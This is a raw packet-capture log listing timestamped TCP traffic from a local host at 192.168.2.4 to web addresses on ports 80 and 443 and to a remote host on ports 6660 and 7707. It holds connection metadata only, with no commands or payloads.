                                                                                                                                                                                                                                Jul 6, 2024 13:28:04.096905947 CEST4981880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:04.101749897 CEST8049818188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:04.101833105 CEST4981880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:04.101862907 CEST4981880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:04.106697083 CEST8049818188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:04.106735945 CEST4981880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:04.111526966 CEST8049818188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:04.796577930 CEST498116660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:04.797485113 CEST498196660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:04.801702976 CEST66604981194.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:04.802328110 CEST66604981994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:04.802428007 CEST498196660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:04.802727938 CEST498196660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:04.807557106 CEST66604981994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:04.841696978 CEST8049818188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:04.841933966 CEST8049818188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:04.842067957 CEST4981880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:04.845563889 CEST4981880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:04.959752083 CEST4982080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:04.964589119 CEST8049820188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:04.964754105 CEST4982080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:04.964754105 CEST4982080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:04.969541073 CEST8049820188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:04.971834898 CEST4982080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:04.976632118 CEST8049820188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:06.142360926 CEST8049820188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:06.142524004 CEST8049820188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:06.142580986 CEST4982080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:06.146646976 CEST4982080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:06.253403902 CEST4982180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:06.260152102 CEST8049821188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:06.260220051 CEST4982180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:06.260272980 CEST4982180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:06.265062094 CEST8049821188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:06.265111923 CEST4982180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:06.270631075 CEST8049821188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:06.453684092 CEST66604981994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:06.453757048 CEST498196660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:06.950158119 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:06.950196028 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:06.950355053 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:06.988373041 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:06.988390923 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.275743008 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.275845051 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.275880098 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.275892973 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.275904894 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276006937 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276019096 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276017904 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276036978 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276057959 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276109934 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276139975 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276174068 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276185989 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276212931 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276240110 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276309013 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276355982 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276370049 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276381016 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276391983 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276408911 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276429892 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276448965 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276509047 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276566982 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276577950 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276596069 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276596069 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276627064 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276698112 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276710033 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276748896 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276818037 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276829958 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276849031 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276937008 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276948929 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276959896 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276967049 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.276972055 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.277003050 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.277089119 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.277102947 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.277108908 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.277132034 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.277149916 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.277160883 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.277208090 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.277281046 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.277292013 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.277302980 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.277314901 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.277328014 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.277329922 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.277355909 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.277448893 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.277520895 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.277532101 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.277553082 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.277623892 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.277637005 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.277648926 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.277648926 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.277662992 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.277720928 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.277720928 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.280934095 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.280997992 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.281011105 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.281023979 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.281035900 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.281064987 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.281086922 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.281102896 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.281115055 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.281116009 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.281198025 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.281198025 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.281295061 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.281306982 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.281356096 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.281382084 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.281394005 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.281405926 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.281423092 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.281436920 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.281527042 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.281538963 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.281550884 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.281553030 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.281574011 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.281588078 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.281606913 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.281670094 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.281681061 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.281689882 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.281691074 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.281704903 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.281719923 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.281923056 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.286436081 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.286478043 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.286489964 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.286508083 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.286530018 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.286540985 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.286560059 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.289798021 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.364022970 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.364033937 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.364044905 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.364093065 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.364106894 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.364145994 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.364156961 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.364270926 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.364274025 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.364280939 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.364291906 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.364310980 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.364335060 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.364469051 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.364484072 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.364495993 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.364499092 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.364509106 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.364538908 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.364619970 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.364645004 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.364648104 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.364655972 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.364752054 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.364775896 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.364787102 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.364797115 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.364809990 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.364840031 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.364840031 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.364916086 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.364936113 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.365011930 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.365024090 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.365035057 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.365045071 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.365073919 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.365109921 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.365109921 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.365195036 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.365206957 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.365221977 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.365232944 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.365251064 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.365317106 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.365353107 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.365412951 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.365422964 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.365428925 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.365516901 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.365528107 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.365546942 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.365626097 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.365631104 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.365638018 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.365653038 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.365664005 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.365674019 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.365704060 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.365773916 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.365899086 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.367777109 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.367837906 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.367950916 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.406080961 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.411415100 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.411497116 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.416531086 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.460964918 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.461108923 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.542387962 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.542412996 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.544879913 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.544991970 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.546627045 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.588515997 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.822437048 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.822479010 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.822495937 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.822511911 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.822523117 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.822531939 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.822563887 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.822577000 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.822613955 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.822746038 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.822797060 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.822884083 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.822932005 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.822938919 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.823033094 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.846051931 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.846683979 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.846743107 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.846750021 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.846762896 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.846805096 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.847070932 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.847081900 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.847095013 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.847105980 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.847124100 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.847151995 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.847160101 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.847178936 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.847229004 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.847230911 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.847243071 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.847254992 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.847296953 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.847389936 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.847409010 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.847419024 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.847434044 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.847461939 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.847538948 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.847549915 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.847560883 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.847573042 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.847584963 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.847594023 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:07.847600937 CEST77074979794.232.249.204192.168.2.4
